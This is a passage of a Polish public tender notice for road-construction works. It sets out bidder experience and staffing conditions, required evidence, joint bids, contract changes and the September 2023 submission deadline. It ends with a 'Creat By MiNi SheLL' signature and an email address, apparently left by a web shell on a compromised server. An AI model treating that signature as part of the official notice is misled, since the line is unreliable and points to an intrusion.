uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/> Zamawiający nie stawia warunku w powyższym zakresie.<br/> 3) sytuacji ekonomicznej lub finansowej Wykonawcy:<br/> Wykonawca musi wykazać, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia wraz z dowodem opłacenia, w tym celu przedstawi dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia wraz z dowodem opłacenia.<br/> 4) zdolności technicznej lub zawodowej Wykonawcy:<br/>	- Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonywał z należytą starannością co najmniej dwie roboty budowlane każda o wartości min. 1 000 000,00 zł brutto (słownie: jeden milion zł i 00/100), odpowiadające swoim rodzajem robotom stanowiącym przedmiot zamówienia, z podaniem ich wartości, nazwy przedmiotu zamówienia (zakres prac), nazwy odbiorcy zamówienia, terminu realizacji (według wzoru stanowiącego załącznik nr 6 do SIWZ), z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty<br/>- Wykonawca spełni warunek jeżeli wykaże w przedstawionym do oferty wykazie osób (według wzoru stanowiącego załącznik nr 7 do SWZ – wykaz osób odpowiedzialnych za realizację zamówienia), które będą uczestniczyć w wykonywaniu zamówienia (w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji, zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami), że ma do dyspozycji osoby posiadające kwalifikacje, doświadczenie i wykształcenie niezbędne do wykonania zamówienia tj. Wykonawca wykaże, że ma do dyspozycji, co najmniej jedną osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów zgodnie z polskim Prawem Budowlanym.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych , jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>2. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369) – załącznik nr 8 do SWZ;<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwie roboty budowlane każda o wartości min. 1 000 000,00 zł brutto (słownie: jeden milion zł i 00/100) wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty zostały wykonane, wraz z załączeniem dowodów określających czy te roboty zostały wykonane lub są wykonywane należycie - według wzoru stanowiącego załącznik nr 6 do SWZ,<br/>4) wykaz osób (według wzoru stanowiącego załącznik nr 7 do SWZ), które będą uczestniczyć w wykonywaniu zamówienia (w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji, zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami), że ma do dyspozycji osoby posiadające kwalifikacje, doświadczenie i wykształcenie niezbędne do wykonania zamówienia tj. Wykonawca wykaże, że ma do dyspozycji, co najmniej jedną osobę posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub równoważne uprawnienia w tej specjalności, które zostały wydane na podstawie wcześniej obowiązujących przepisów zgodnie z polskim Prawem Budowlanym<br/>5) zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;<br/>6) zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;<br/>7) Opłacona polisa lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia wraz z dowodem opłacenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.DOKUMENTY SKŁADANE WRAZ Z OFERTĄ. Do oferty (formularz ofertowy stanowiący załącznik nr 3 do SWZ) każdy Wykonawca<br/>musi dołączyć aktualne na dzień składania ofert oświadczenie w zakresie wskazanym w załączniku nr 4 do SWZ - oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu oraz w załączniku nr 5 do SWZ - oświadczenie o braku podstaw do wykluczenia z<br/>postępowania, a także kosztorys ofertowy na podstawie którego będzie oszacowana wartość zadania, pod rygorem odrzucenia<br/>oferty. Kosztorys ofertowy ma odzwierciedlać pozycje z przedmiaru robót.<br/>2. Informacje zawarte w oświadczeniach, o których mowa w ust. 1 stanowią potwierdzenie, że Wykonawca nie podlega wykluczeniu<br/>oraz spełnia warunki udziału w postępowaniu.<br/>3. Oświadczenia, o których mowa w ust. 1, składane są pod rygorem nieważności w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym.<br/>Do oferty wykonawca załącza również:<br/>a) Pełnomocnictwo<br/>b) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia (załącznik nr 10 do SWZ) jeżeli dotyczy<br/>c) Zobowiązanie podmiotu trzeciego (załącznik nr 9 do SWZ) jeżeli dotyczy</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pozostałe dokumenty lub oświadczenia:<br/>1.Wykonawca może w celu potwierdzenia spełniania warunków udziału w polegać na zdolnościach technicznych lub<br/>zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków<br/>prawnych.<br/>2. W odniesieniu do warunków dotyczących doświadczenia, wykonawcy mogą polegać na zdolnościach podmiotów<br/>udostępniających zasoby, jeśli podmioty te wykonają świadczenie do realizacji którego te zdolności są wymagane.<br/>3. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tych podmiotów . Wzór oświadczenia stanowi załącznik nr 9 do SWZ.<br/>4. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie (według wzoru<br/>stanowiącego załącznik nr 10 do SWZ), z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni<br/>wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w<br/>Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie (według wzoru<br/>stanowiącego załącznik nr 10 do SWZ), z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni<br/>wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych w projektowanych postanowieniach umowy - projekcie umowy, stanowiącym Załącznik nr 2 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 p.z.p. oraz wskazanym w Projekcie Umowy, stanowiącym Załącznik nr 2 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-21 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez Platformę e-zamówienia do dnia 21.09.2023 r. do godziny 8:30. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto Platformie ezamówienia.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-21 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający informuje, że zaleca odbycie wizji lokalnej przyszłego terenu robót celem sprawdzenia miejsca robót oraz<br/>warunków związanych z wykonaniem prac będących przedmiotem zamówienia. Wizja lokalna nie ma charakteru<br/>obligatoryjnego obowiązku Wykonawcy, jest jedynie zalecana i ma charakter wyłącznie dobrowolny. W związku z<br/>powyższym wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny. Koszt wizji lokalnej ponosi<br/>Wykonawca.<br/>Podwykonawstwo:<br/>1. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy (podwykonawcom).<br/>2. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia.<br/>3. Zamawiający wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom, Wykonawca wskazał w<br/>ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał (o ile są mu wiadome na<br/>tym etapie) nazwy (firmy) tych podwykonawców.<br/>4. Pozostałe wymagania dotyczące podwykonawstwa: stosuje się odpowiednio wymagania określone we wzorze umowy<br/>stanowiącym załącznik nr 2 do SWZ.<br/>1. Zamawiający zawiera umowę w sprawie zamówienia publicznego w terminie nie krótszym niż 5 dni od dnia przesłania<br/>zawiadomienia o wyborze najkorzystniejszej oferty.<br/>2. Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w ust. 1,<br/>jeżeli w postępowaniu o udzielenie zamówienia prowadzonym w trybie podstawowym złożono tylko jedną ofertę.<br/>3. Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, będzie zobowiązany przed podpisaniem umowy do<br/>wniesienia zabezpieczenia należytego wykonania umowy (jeżeli jego wniesienie było wymagane) w wysokości i formie<br/>określonej w Rozdziale XXI SWZ.<br/>4. W przypadku wyboru oferty złożonej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Zamawiający zastrzega sobie prawo żądania przed zawarciem umowy w sprawie zamówienia publicznego umowy<br/>regulującej współpracę tych Wykonawców.<br/>5. Wykonawca będzie zobowiązany do podpisania umowy w miejscu i terminie wskazanym przez Zamawiającego.<br/>6. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie<br/>zamówienia publicznego lub nie wnosi wymaganego zabezpieczenia należytego wykonania umowy, Zamawiający może<br/>dokonać ponownego badania i oceny ofert spośród ofert pozostałych w postępowaniu Wykonawców oraz wybrać<br/>najkorzystniejszą ofertę albo unieważnić postępowanie.<br/>7. Wszelkie zmiany i warunki odstąpienia umowy zawarte są w załączniku nr 2 do SWZ - projekt umowy.<br/>1. Środki ochrony prawnej określone w niniejszym dziale przysługują wykonawcy, uczestnikowi konkursu oraz innemu<br/>podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia lub nagrody w konkursie oraz poniósł lub może ponieść<br/>szkodę w wyniku naruszenia przez zamawiającego przepisów ustawy p.z.p.<br/>Integralną część niniejszego ogłoszenia o zamówieniu stanowi Specyfikacja Warunków Zamówienia wraz z załącznikami:<br/>1. Załącznik nr 1 do SWZ – dokumentacja techniczna (projektowa)<br/>2. Załącznik nr 2 do SWZ – projektowane postanowienia umowy - projekt umowy<br/>3. Załącznik nr 3 do SWZ – formularz ofertowy<br/>4. Załącznik nr 4 do SWZ – oświadczenie o spełnianiu warunków udziału w postępowaniu<br/>5. Załącznik nr 5 do SWZ – oświadczenie o braku podstaw do wykluczenia z postępowania

Creat By MiNi SheLL
Email: jattceo@gmail.com